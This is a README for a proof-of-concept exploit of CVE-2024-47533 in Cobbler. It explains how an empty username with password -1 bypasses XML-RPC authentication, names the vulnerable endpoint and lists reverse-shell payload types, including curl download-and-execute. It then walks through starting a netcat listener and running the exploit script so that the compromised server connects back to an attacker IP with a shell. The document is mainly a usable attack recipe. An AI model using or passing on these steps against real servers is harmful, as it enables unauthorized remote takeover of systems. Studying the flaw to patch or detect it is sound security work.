# CVE-2024-47533 - Cobbler XMLRPC Authentication Bypass RCE Exploit

## Critical Remote Code Execution via Authentication Bypass in Cobbler  
### PoC implementation.

---

## Resume

Cobbler, a Linux installation server that enables rapid setup of network installation environments, has an authentication vulnerability in versions 3.0.0 up to (but not including) 3.2.3 and 3.3.7. The function utils.get_shared_secret() always returns -1, allowing anyone to connect to the Cobbler XML-RPC interface with an empty username ('') and password -1. This lets an attacker with network access gain full control of the Cobbler server. The vulnerability is fixed in versions 3.2.3 and 3.3.7.

---

## 🛠 Technical Breakdown

The vulnerability is caused by improper handling of the shared secret in the `utils.get_shared_secret()` function, which always returns `-1`, effectively bypassing authentication. This lets any network user connect to Cobbler’s XMLRPC interface with empty credentials and execute arbitrary commands.

---

## 🔥 Vulnerable Endpoint

`http://<target>:25151/` — Cobbler's XMLRPC API endpoint

---

## 💥 Example Payloads

The exploit script supports various reverse shell payloads including:

- Bash reverse shell
- Netcat shells (`nc`)
- Curl download & execute

---

## Proof-of-Concept (PoC) 

### Preparing the Listener

Start a Netcat listener on your machine:

```bash
nc -lvnp 4444
```

### 🚀 Launching the Exploit

Run the exploit script CVE-2024-47533.py.

```bash
python3 CVE-2024-47533.py -t http://127.0.0.1:25151 -l 10.10.15.16 -p 4444 --payload bash
```

### Parameters 

`-t : Target (Example: -t http://1<IP_SERVICE>:<PORT>)`

`-l: Local IP (Example: -l 10.10.11.80)`

`-p : Port <LOCAL_PORT> (Example: -p 4444)`

`--payload: Payload(bash, curl, nc) (Example: --payload bash)`

### 💻 Successful Remote Shell Access

Upon successful execution, the reverse shell will connect back to the listener, granting the attacker remote access to the server.

